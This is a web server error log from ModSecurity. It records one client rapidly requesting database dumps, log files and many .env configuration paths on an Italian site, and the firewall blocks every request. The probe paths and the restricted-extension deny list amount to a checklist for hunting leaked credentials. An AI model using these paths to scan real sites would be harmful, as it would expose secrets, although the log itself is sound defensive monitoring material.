[Fri Jan 09 16:49:20.345398 2026] [:error] [pid 1290987] [client 18.130.245.147:42104] [client 18.130.245.147] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/database.sql"] [unique_id "aWEjgJa6YpMWICkHe7jGUwAAAAI"]
[Fri Jan 09 16:49:20.345707 2026] [:error] [pid 1290987] [client 18.130.245.147:42104] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/database.sql"] [unique_id "aWEjgJa6YpMWICkHe7jGUwAAAAI"]
[Fri Jan 09 16:49:20.345855 2026] [:error] [pid 1290987] [client 18.130.245.147:42104] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/database.sql"] [unique_id "aWEjgJa6YpMWICkHe7jGUwAAAAI"]
[Fri Jan 09 16:49:20.449938 2026] [:error] [pid 1293937] [client 18.130.245.147:42142] [client 18.130.245.147] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/storage/logs/laravel.log"] [unique_id "aWEjgC30tpu2Qs_7o9csCAAAAAY"]
[Fri Jan 09 16:49:20.450277 2026] [:error] [pid 1293937] [client 18.130.245.147:42142] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/storage/logs/laravel.log"] [unique_id "aWEjgC30tpu2Qs_7o9csCAAAAAY"]
[Fri Jan 09 16:49:20.450453 2026] [:error] [pid 1293937] [client 18.130.245.147:42142] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/storage/logs/laravel.log"] [unique_id "aWEjgC30tpu2Qs_7o9csCAAAAAY"]
[Fri Jan 09 16:49:20.941922 2026] [:error] [pid 1290989] [client 18.130.245.147:42290] [client 18.130.245.147] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/dump.sql"] [unique_id "aWEjgLwxb_CFGAx2PBFTAwAAAAQ"]
[Fri Jan 09 16:49:20.942222 2026] [:error] [pid 1290989] [client 18.130.245.147:42290] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/dump.sql"] [unique_id "aWEjgLwxb_CFGAx2PBFTAwAAAAQ"]
[Fri Jan 09 16:49:20.942393 2026] [:error] [pid 1290989] [client 18.130.245.147:42290] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/dump.sql"] [unique_id "aWEjgLwxb_CFGAx2PBFTAwAAAAQ"]
[Fri Jan 09 16:49:21.127832 2026] [:error] [pid 1291018] [client 18.130.245.147:42346] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aWEjgfa-381C0T8V_x3aYAAAAAU"]
[Fri Jan 09 16:49:21.128017 2026] [:error] [pid 1291018] [client 18.130.245.147:42346] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aWEjgfa-381C0T8V_x3aYAAAAAU"]
[Fri Jan 09 16:49:21.128162 2026] [:error] [pid 1291018] [client 18.130.245.147:42346] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aWEjgfa-381C0T8V_x3aYAAAAAU"]
[Fri Jan 09 16:49:21.228081 2026] [:error] [pid 1290987] [client 18.130.245.147:42376] [client 18.130.245.147] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/log/error.log"] [unique_id "aWEjgZa6YpMWICkHe7jGVAAAAAI"]
[Fri Jan 09 16:49:21.228395 2026] [:error] [pid 1290987] [client 18.130.245.147:42376] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/log/error.log"] [unique_id "aWEjgZa6YpMWICkHe7jGVAAAAAI"]
[Fri Jan 09 16:49:21.228589 2026] [:error] [pid 1290987] [client 18.130.245.147:42376] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/log/error.log"] [unique_id "aWEjgZa6YpMWICkHe7jGVAAAAAI"]
[Fri Jan 09 16:49:21.321813 2026] [:error] [pid 1293937] [client 18.130.245.147:42404] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aWEjgS30tpu2Qs_7o9csCQAAAAY"]
[Fri Jan 09 16:49:21.322014 2026] [:error] [pid 1293937] [client 18.130.245.147:42404] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aWEjgS30tpu2Qs_7o9csCQAAAAY"]
[Fri Jan 09 16:49:21.322166 2026] [:error] [pid 1293937] [client 18.130.245.147:42404] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aWEjgS30tpu2Qs_7o9csCQAAAAY"]
[Fri Jan 09 16:49:21.727921 2026] [:error] [pid 1290986] [client 18.130.245.147:42520] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aWEjgXvPx48oXeBpWHAqXAAAAAE"]
[Fri Jan 09 16:49:21.728130 2026] [:error] [pid 1290986] [client 18.130.245.147:42520] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aWEjgXvPx48oXeBpWHAqXAAAAAE"]
[Fri Jan 09 16:49:21.728304 2026] [:error] [pid 1290986] [client 18.130.245.147:42520] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aWEjgXvPx48oXeBpWHAqXAAAAAE"]
[Fri Jan 09 16:49:21.946056 2026] [:error] [pid 1290988] [client 18.130.245.147:42586] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aWEjgZnqcf3ij-c56sst9gAAAAM"]
[Fri Jan 09 16:49:21.946273 2026] [:error] [pid 1290988] [client 18.130.245.147:42586] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aWEjgZnqcf3ij-c56sst9gAAAAM"]
[Fri Jan 09 16:49:21.946451 2026] [:error] [pid 1290988] [client 18.130.245.147:42586] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aWEjgZnqcf3ij-c56sst9gAAAAM"]
[Fri Jan 09 16:49:22.047134 2026] [:error] [pid 1291018] [client 18.130.245.147:42610] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aWEjgva-381C0T8V_x3aYQAAAAU"]
[Fri Jan 09 16:49:22.047340 2026] [:error] [pid 1291018] [client 18.130.245.147:42610] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aWEjgva-381C0T8V_x3aYQAAAAU"]
[Fri Jan 09 16:49:22.047494 2026] [:error] [pid 1291018] [client 18.130.245.147:42610] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aWEjgva-381C0T8V_x3aYQAAAAU"]
[Fri Jan 09 16:49:22.150325 2026] [:error] [pid 1290987] [client 18.130.245.147:42634] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aWEjgpa6YpMWICkHe7jGVQAAAAI"]
[Fri Jan 09 16:49:22.150552 2026] [:error] [pid 1290987] [client 18.130.245.147:42634] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aWEjgpa6YpMWICkHe7jGVQAAAAI"]
[Fri Jan 09 16:49:22.150702 2026] [:error] [pid 1290987] [client 18.130.245.147:42634] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aWEjgpa6YpMWICkHe7jGVQAAAAI"]
[Fri Jan 09 16:49:22.254249 2026] [:error] [pid 1293937] [client 18.130.245.147:42664] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aWEjgi30tpu2Qs_7o9csCgAAAAY"]
[Fri Jan 09 16:49:22.254484 2026] [:error] [pid 1293937] [client 18.130.245.147:42664] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aWEjgi30tpu2Qs_7o9csCgAAAAY"]
[Fri Jan 09 16:49:22.254637 2026] [:error] [pid 1293937] [client 18.130.245.147:42664] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aWEjgi30tpu2Qs_7o9csCgAAAAY"]
[Fri Jan 09 16:49:22.447901 2026] [:error] [pid 1295010] [client 18.130.245.147:42710] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/config/.env"] [unique_id "aWEjgiTjpONdb2ogUxonrwAAAAg"]
[Fri Jan 09 16:49:22.448104 2026] [:error] [pid 1295010] [client 18.130.245.147:42710] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/config/.env"] [unique_id "aWEjgiTjpONdb2ogUxonrwAAAAg"]
[Fri Jan 09 16:49:22.448263 2026] [:error] [pid 1295010] [client 18.130.245.147:42710] [client 18.130.245.147] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/config/.env"] [unique_id "aWEjgiTjpONdb2ogUxonrwAAAAg"]
[Fri Jan 09 16:49:22.547496 2026] [authz_core:error] [pid 1290985] [client 18.130.245.147:42726] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Fri Jan 09 16:49:22.645616 2026] [:error] [pid 1290986] [client 18.130.245.147:42754] [client 18.130.245.147] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/src/.env"] [unique_id "aWEjgnvPx48oXeBpWHAqXQAAAAE"]
[Fri Jan 09 16:49:22.645833 2026] [:error] [pid 1290986] [client 18.130.245.147:42754] [client 18.130.245.147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/src/.env"] [unique_id "aWEjgnvPx48oXeBpWHAqXQAAAAE"]
